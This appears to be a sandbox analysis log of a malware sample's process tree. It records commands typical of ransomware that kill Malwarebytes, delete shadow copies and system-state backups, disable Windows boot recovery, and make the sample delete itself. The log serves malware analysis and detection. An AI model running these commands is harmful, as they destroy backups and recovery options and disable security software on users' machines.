C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mbamtray.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:4004
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Cmd.exe >NUL 2> 12⤵
- Kills process with taskkill
PID:4028
-
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:4052
-
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3264
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:3352
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3372
-
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP2⤵
- Deletes System State backups
- Drops file in Windows directory
PID:3388
-
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest2⤵
- Deletes System State backups
- Drops file in Windows directory
PID:3468
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY DELETE /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3520
-
-
C:\Windows\SysWOW64\Cmd.exeCmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe"2⤵
- Deletes itself
PID:3820 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30003⤵
- Runs ping.exe
PID:3844
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3076